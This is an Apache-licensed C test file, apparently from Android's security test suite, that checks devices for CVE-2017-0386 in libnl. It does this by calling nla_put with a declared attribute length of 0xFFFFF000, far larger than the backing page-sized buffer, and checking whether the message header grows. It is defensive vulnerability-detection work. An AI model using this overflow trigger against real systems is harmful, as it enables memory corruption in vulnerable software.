/**
* Copyright (C) 2019 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#define _GNU_SOURCE
#define LOG_TAG "CVE-2017-0386"
#include <sys/wait.h>
#include <sys/types.h>
#include <stdio.h>
#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>
#include "../includes/common.h"
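/*
 * Detection test tagged CVE-2017-0386 (see LOG_TAG).
 *
 * The test builds one netlink message, appends a baseline attribute that
 * nearly fills a page, records the header length, and then asks nla_put()
 * to append a second attribute whose declared length (0xFFFFF000) is far
 * larger than the page-sized buffer backing it. The verdict depends only on
 * whether the header length moved after that second call:
 *
 *   EXIT_SUCCESS    - nlmsg_len is unchanged, i.e. nothing was appended.
 *   EXIT_VULNERABLE - nlmsg_len changed (113 according to the original
 *                     comment; presumably defined in ../includes/common.h).
 *   EXIT_FAILURE    - setup failed (allocation or the baseline nla_put),
 *                     so no verdict could be reached.
 *
 * All exits go through a single cleanup path so the message and the payload
 * buffer are always released.
 */
int main(void) {
    struct nl_msg *message = NULL;
    struct nlmsghdr *hdr = NULL;
    char *data = NULL;
    uint32_t baseline_len = 0;
    int ret = EXIT_FAILURE;
    int rc = 0;
    int pagesize = getpagesize();
    size_t payloadlength = pagesize + 12 - 0x30;
    size_t payload2length = pagesize;

    message = nlmsg_alloc();
    if (message == NULL) {
        ALOGE("Alloc message memory failed");
        goto out;
    }

    ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
    hdr = message->nm_nlh;

    /* Baseline attribute: payloadlength bytes of 0x41. */
    data = malloc(payloadlength);
    if (data == NULL) {
        ALOGE("Alloc data memory failed");
        goto out;
    }

    memset(data, 0x41, payloadlength);
    rc = nla_put(message, 0x4444, payloadlength, data);
    if (rc < 0) {
        /*
         * Without the baseline attribute in place the later length
         * comparison is meaningless and could report a false pass, so treat
         * this as a setup failure rather than continuing.
         */
        ALOGE("Put baseline attribute failed: %d", rc);
        goto out;
    }

    baseline_len = hdr->nlmsg_len;
    ALOGI("message address [%p, %p]", (void *)hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", baseline_len);

    free(data);
    data = NULL;

    /* Second buffer: payload2length (one page) bytes of 0x33. */
    data = malloc(payload2length);
    if (data == NULL) {
        ALOGE("Alloc data2 memory failed");
        goto out;
    }
    memset(data, 0x33, payload2length);
    ALOGI("\n\n\nPutting down overflow.......\n\n\n");

    /*
     * The declared length deliberately does not match the buffer size. The
     * return value is logged for triage only; the verdict below is based on
     * the header length, as in the original test.
     */
    rc = nla_put(message, 0x8888, 0xFFFFF000, data);
    ALOGI("oversized nla_put returned %d", rc);

    ALOGI("message address [%p, %p]", (void *)hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", hdr->nlmsg_len);

    /* A changed header length means the oversized attribute was accepted. */
    ret = (baseline_len != hdr->nlmsg_len) ? EXIT_VULNERABLE : EXIT_SUCCESS;

out:
    /*
     * The original guarded these calls with inverted NULL checks, so neither
     * buffer was ever released. free(NULL) is a no-op, so no guard is needed
     * for data.
     */
    free(data);
    data = NULL;

    if (message != NULL) {
        nlmsg_free(message);
        message = NULL;
    }
    return ret;
}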